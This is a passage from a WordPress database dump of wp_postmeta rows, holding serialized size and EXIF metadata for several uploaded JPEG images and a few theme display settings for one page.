}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"7-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"7-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"7-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"7-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"7-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"7-1.jpg\";}'),(13800,5315,'_wp_attached_file','2020/04/8-scaled.jpg'),(13801,5315,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:20:\"2020/04/8-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"8-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"8-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:14:\"8-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:15:\"8-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:14:\"8-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:14:\"8-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:15:\"8-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"8-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:13:\"8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"8-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:5:\"8.jpg\";}'),(13802,5316,'_wp_attached_file','2020/04/9-scaled.jpg'),(13803,5316,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:20:\"2020/04/9-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"9-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"9-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:13:\"9-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:13:\"9-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:14:\"9-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:15:\"9-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:13:\"9-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:14:\"9-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:14:\"9-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:15:\"9-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:13:\"9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"9-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:13:\"9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:13:\"9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"9-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:13:\"9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:5:\"9.jpg\";}'),(13804,5317,'_wp_attached_file','2020/04/10-scaled.jpg'),(13805,5317,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:21:\"2020/04/10-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:15:\"10-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"10-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:14:\"10-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:14:\"10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:15:\"10-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:16:\"10-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:14:\"10-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:15:\"10-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:15:\"10-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:16:\"10-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:14:\"10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:14:\"10-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:14:\"10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"10-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:6:\"10.jpg\";}'),(13806,5318,'_wp_attached_file','2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation-scaled.jpg'),(13807,5318,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:70:\"2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:64:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:64:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:64:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:64:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:63:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:55:\"Green-and-Cream-Simple-Sales-Marketing-Presentation.jpg\";}'),(13808,5308,'_edit_last','1'),(13809,5308,'qodef_page_content_behind_header_meta','no'),(13810,5308,'qodef_boxed_background_image_attachment_meta','fixed'),(13811,5308,'qodef_disable_vertical_header_background_image_meta','no'),(13812,5308,'qodef_disable_header_widget_logo_area_meta','no'),(13813,5308,'qodef_disable_header_widget_menu_area_meta','no'),(13814,5308,'slide_template','default'),(13815,5308,'rs_page_bg_color','#ffffff'),(13816,5320,'_wp_attached_file','2020/04/2-3-scaled.jpg'),(13817,5320,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:22:\"2020/04/2-3-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"2-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"2-3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"2-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"2-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:15:\"2-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:15:\"2-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:16:\"2-3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:17:\"2-3-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:15:\"2-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:16:\"2-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:16:\"2-3-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:17:\"2-3-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"2-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:15:\"2-3-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"2-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"2-3-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"2-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:7:\"2-3.jpg\";}'),(13818,5322,'_wp_attached_file','2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation-1-scaled.jpg'),(13819,5322,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1440;s:4:\"file\";s:72:\"2020/04/Green-and-Cream-Simple-Sales-Marketing-Presentation-1-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:66:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:66:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:67:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-2048x1152.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:66:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:66:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:67:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:65:\"Green-and-Cream-Simple-Sales-Marketing-Presentation-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:65:\"Green-and-Crea